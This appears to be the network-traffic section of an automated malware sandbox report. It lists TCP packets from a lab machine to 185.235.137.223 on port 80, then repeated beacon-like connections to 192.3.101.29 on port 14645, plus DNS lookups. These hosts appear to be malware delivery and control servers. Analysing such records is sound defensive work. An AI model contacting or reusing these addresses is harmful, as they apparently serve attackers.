                                                                                            Sep 27, 2024 14:00:19.710140944 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.710141897 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.710186005 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.710863113 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.710874081 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.710884094 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.710894108 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.710915089 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.710937023 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711188078 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711196899 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711206913 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711215973 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711225986 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711229086 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711246967 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711673975 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711683035 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711693048 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711703062 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711713076 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711714983 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711721897 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711733103 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711733103 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711743116 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711751938 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.711754084 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711766005 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.711796045 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.712578058 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712588072 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712598085 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712608099 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712616920 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712626934 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.712635040 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712641001 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.712645054 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712654114 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712657928 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712667942 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712668896 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.712678909 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.712699890 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.712699890 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.713505983 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713517904 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713526964 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713536978 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713546038 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713555098 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713560104 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713560104 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.713568926 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713577986 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713577986 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.713587999 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713596106 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.713597059 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.713610888 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.713639021 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.714432955 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714442968 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714451075 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714461088 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714471102 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714478016 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.714479923 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714490891 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714498997 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.714508057 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714518070 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714528084 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714533091 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714536905 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.714550018 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.714574099 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.714574099 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.715439081 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715449095 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715459108 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715468884 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715477943 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715481043 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.715487957 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715497017 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715506077 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.715507984 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715516090 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.715517998 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715528011 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.715548992 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716295958 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716306925 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716316938 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716325998 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716336966 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716346979 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716346979 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716351986 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716356993 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716367006 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716376066 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716386080 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716391087 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716394901 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716406107 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716429949 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.716949940 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716960907 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716976881 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716988087 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.716996908 CEST8049163185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.717000961 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.717019081 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:19.888834953 CEST4916380192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:23.051811934 CEST4916414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:23.056759119 CEST1464549164192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:23.056842089 CEST4916414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:23.063438892 CEST4916414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:23.068661928 CEST1464549164192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:24.455018997 CEST1464549164192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:24.455224991 CEST4916414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:24.455298901 CEST4916414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:24.460084915 CEST1464549164192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:35.161748886 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:35.174478054 CEST1464549165192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:35.174595118 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:35.177875996 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:35.182718992 CEST1464549165192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:36.905972004 CEST1464549165192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:36.906014919 CEST1464549165192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:36.906135082 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:36.906135082 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:36.906182051 CEST4916514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:36.916172028 CEST1464549165192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:42.144253016 CEST4916614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:42.150217056 CEST1464549166192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:42.150295973 CEST4916614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:42.153266907 CEST4916614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:42.158170938 CEST1464549166192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:43.549102068 CEST1464549166192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:43.549242020 CEST4916614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:43.549315929 CEST4916614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:43.554188967 CEST1464549166192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:44.559355974 CEST4916714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:44.564313889 CEST1464549167192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:44.564407110 CEST4916714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:44.567723989 CEST4916714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:44.573250055 CEST1464549167192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:45.972157955 CEST1464549167192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:45.972234011 CEST4916714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:45.972307920 CEST4916714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:45.977267027 CEST1464549167192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:47.474185944 CEST4916814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:47.480032921 CEST1464549168192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:47.480117083 CEST4916814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:47.483148098 CEST4916814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:47.489203930 CEST1464549168192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:48.920773029 CEST1464549168192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:48.920847893 CEST4916814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:48.920924902 CEST4916814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:48.927946091 CEST1464549168192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:49.943753004 CEST4916914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:49.948673964 CEST1464549169192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:49.948771000 CEST4916914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:49.951797962 CEST4916914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:49.958054066 CEST1464549169192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:51.366162062 CEST1464549169192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:51.366389036 CEST4916914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:51.366647959 CEST4916914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:51.372034073 CEST1464549169192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:53.495265961 CEST4917014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:53.500118971 CEST1464549170192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:53.500221968 CEST4917014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:53.503772974 CEST4917014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:53.510029078 CEST1464549170192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:54.908638954 CEST1464549170192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:54.908880949 CEST4917014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:54.908880949 CEST4917014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:54.914639950 CEST1464549170192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:55.932188034 CEST4917114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:55.937397957 CEST1464549171192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:55.937505960 CEST4917114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:55.942361116 CEST4917114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:55.947326899 CEST1464549171192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:57.365087032 CEST1464549171192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:57.365278959 CEST4917114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:57.365410089 CEST4917114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:57.373280048 CEST1464549171192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:58.388776064 CEST4917214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:58.394412041 CEST1464549172192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:58.394474983 CEST4917214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:58.398320913 CEST4917214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:58.403300047 CEST1464549172192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:59.805936098 CEST1464549172192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:00:59.806039095 CEST4917214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:59.806096077 CEST4917214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:00:59.812206984 CEST1464549172192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:00.830291986 CEST4917314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:00.835506916 CEST1464549173192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:00.835586071 CEST4917314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:00.841974974 CEST4917314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:00.849184990 CEST1464549173192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:02.280795097 CEST1464549173192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:02.280898094 CEST4917314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:02.281007051 CEST4917314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:02.286040068 CEST1464549173192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:03.296070099 CEST4917414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:03.301287889 CEST1464549174192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:03.301434994 CEST4917414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:03.310164928 CEST4917414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:03.315447092 CEST1464549174192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:04.729562044 CEST1464549174192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:04.729676008 CEST4917414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:04.729758024 CEST4917414645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:04.734591961 CEST1464549174192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:05.753276110 CEST4917514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:05.759372950 CEST1464549175192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:05.759475946 CEST4917514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:05.763191938 CEST4917514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:05.772177935 CEST1464549175192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:07.191544056 CEST1464549175192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:07.191648960 CEST4917514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:07.191715002 CEST4917514645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:07.200320005 CEST1464549175192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:08.303080082 CEST4917614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:08.308043003 CEST1464549176192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:08.308123112 CEST4917614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:08.313076019 CEST4917614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:08.318074942 CEST1464549176192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:09.705178022 CEST1464549176192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:09.705312967 CEST4917614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:09.705394983 CEST4917614645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:09.710263968 CEST1464549176192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:10.720757961 CEST4917714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:10.726759911 CEST1464549177192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:10.726834059 CEST4917714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:10.730273962 CEST4917714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:10.735039949 CEST1464549177192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:12.307693958 CEST1464549177192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:12.307813883 CEST4917714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:12.307890892 CEST4917714645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:12.312733889 CEST1464549177192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:13.330015898 CEST4917814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:13.335985899 CEST1464549178192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:13.336071014 CEST4917814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:13.338989973 CEST4917814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:13.344634056 CEST1464549178192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:14.815509081 CEST1464549178192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:14.815579891 CEST4917814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:14.815623045 CEST4917814645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:14.820702076 CEST1464549178192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:15.838031054 CEST4917914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:15.842883110 CEST1464549179192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:15.842974901 CEST4917914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:15.847942114 CEST4917914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:15.852761984 CEST1464549179192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:17.339435101 CEST1464549179192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:17.339634895 CEST4917914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:17.339692116 CEST4917914645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:17.345546961 CEST1464549179192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:18.357287884 CEST4918014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:18.362545967 CEST1464549180192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:18.362632036 CEST4918014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:18.367649078 CEST4918014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:18.377497911 CEST1464549180192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:19.774490118 CEST1464549180192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:01:19.774756908 CEST4918014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:19.774756908 CEST4918014645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:01:19.779715061 CEST1464549180192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:02:20.998936892 CEST4918114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:02:21.004431963 CEST1464549181192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:02:21.007460117 CEST4918114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:02:21.010667086 CEST4918114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:02:21.015568972 CEST1464549181192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:02:22.430524111 CEST1464549181192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:02:22.430608034 CEST4918114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:02:22.430608034 CEST4918114645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:02:22.435622931 CEST1464549181192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.219405890 CEST4918214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:12.224385023 CEST1464549182192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.225337982 CEST4918214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:12.230276108 CEST4918214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:12.236130953 CEST1464549182192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:13.636445999 CEST1464549182192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:13.637192965 CEST4918214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:13.637223005 CEST4918214645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:13.644413948 CEST1464549182192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.174247026 CEST4918314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:16.179100037 CEST1464549183192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.179155111 CEST4918314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:16.182462931 CEST4918314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:16.187247038 CEST1464549183192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:17.612040043 CEST1464549183192.3.101.29192.168.2.22
                                                                                            Sep 27, 2024 14:04:17.612389088 CEST4918314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:17.612430096 CEST4918314645192.168.2.22192.3.101.29
                                                                                            Sep 27, 2024 14:04:17.618256092 CEST1464549183192.3.101.29192.168.2.22

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Sep 27, 2024 14:00:15.814178944 CEST5456253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:15.825017929 CEST53545628.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:19.993130922 CEST5291753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:20.993067026 CEST5291753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:22.007102966 CEST5291753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:23.049609900 CEST53529178.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:23.091841936 CEST53529178.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:25.475920916 CEST6275153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:26.484543085 CEST6275153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:26.835711002 CEST53529178.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:27.498392105 CEST6275153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:29.510925055 CEST6275153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:30.616420031 CEST53627518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:31.494175911 CEST53627518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:31.620106936 CEST5789353192.168.2.228.8.8.8
